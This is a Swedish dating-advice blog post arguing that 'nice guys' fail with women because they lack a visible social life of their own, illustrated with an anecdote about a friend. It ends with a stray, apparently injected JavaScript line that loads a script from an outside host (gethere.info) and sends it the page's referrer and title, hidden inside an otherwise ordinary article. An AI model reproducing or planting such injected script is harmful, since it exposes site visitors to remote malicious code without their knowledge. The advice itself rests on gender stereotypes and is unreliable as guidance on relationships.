nice guys finish last 300x177 Varför snälla killar inte får tjejer.

Det finns en nyckelskillnad mellan att vara en attraktiv man som kvinnor dras till och vara dörrmattan som kvinnor trampar på. Denna skillnaden innebär att ha förmågan att subkommunicera till kvinnor att ditt liv inte går ut på att cirkla kring dem. Den attraktiva mannen är alltid upptagen med sitt eget liv och även om han mer än gärna umgås med kvinnor så är han inte alltid tillgängling pga andra uppbokningar som kretsar kring hans sociala liv.

Att ge med sig för en speciell kvinna och förlita sig på henne för att hitta lyckan är ett fatal misstag som många gör. När du väl är i ett förhållande så är det ok att planera ditt liv med någon annan i tanken. Men att göra detta för tidigt är en ”major turnoff” för tjejer.

Tänkt dig att du frågar en tjej om att gå ut och hon svarar -vilken kväll passar bäst?

”Två exempel på tänkbara svar.Vilken dag som helst passar mig bra. Allt jag gör egentligen är att sitta hemma och kolla på TV de flesta kvällar i allafall”

Eller
”Onsdag natt passar bäst för mig, jag skulle även kunna torsdagskväll men det får vara sent isåfall för att jag ska åka inlines med några kompisar efter jobbet. Vi skulle kunna äta lunch men på kvällen ska jag äta middag med mina vänner”.

Kolla på skillnaden på dessa två svar. Den första subkommunicerar till tjejen att du inte har något socialt liv.Vilket i sig är en turnoff. En tjej kommer förvänta sig att denna typ av kille är en dörrmatta som hon kan trampa på hur hon vill.

Det andra svaret subkommunicerar att du har egna intressen och att du inte bryter dina planer för vem som helst. Detta är enormt attraktivt och att du inte är en dörrmatta eller mes!

En annan sak är killar som håller med tjejen hela tiden även i åsikter som de inte delar. Detta är enorm oattraktivt. Testa istället att inte hålla med alla och säga det rakt ut. Du har helt fel eller ännu mer vågat ”Du är så full av skit” alt ”fuck that” så här ligger det till… Gör detta med ett leende och du får se vad som händer. Kvinnor älskar när de blir utmanade.

Vi har alla hört myten att snälla killar inte kan få tjejer. Detta är komplett falskt. Sanningen är att de flesta snälla killar inte visar att de har ett eget socialt liv(förutom jobb) Om en snäll kille som är attraktiv kan inte få till det med tjejer så är det för att han ger allt av sig själv till kvinnor istället för att jobba på sitt eget sociala liv.

Jag har en kompis, låt oss säga att han heter Jonas. Jonas är vittsig, ser bra ut, han är humoristisk och enormt intelligent. Varenda tjej som träffar honom säger att de älskar honom. Men att de aldrig skulle tänka sig inleda någon form av relation med honom. Anledningen till att Jonas inte får till det sexuellt är att han är osäker på sig själv och att han alltid kommer springade så fort en tjej ringer honom. Jonas har inget eget socialt liv (förutom jobbet) och tjejerna vet att så fort de behöver en axel att gråta mot så kommer Jonas att finnas där.

Kvinnor finns alltid omkring Jonas därför att han lyssnar och tycker om ”dem för den de är”. Men dessa kvinnor ville inte ha honom sexuellt. Detta exempel lär oss män olika orsaker till att tjejer inte tycker om snälla killar.Vilket är helt fel.

Sanningen är att om dessa killar kunde kommunicera till tjejer att de har har ett socialt liv som de njuter av så skulle så många tjejer vilja ha dem utan minsta tvekan.

Ha en skön lördag.

Gustavo

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;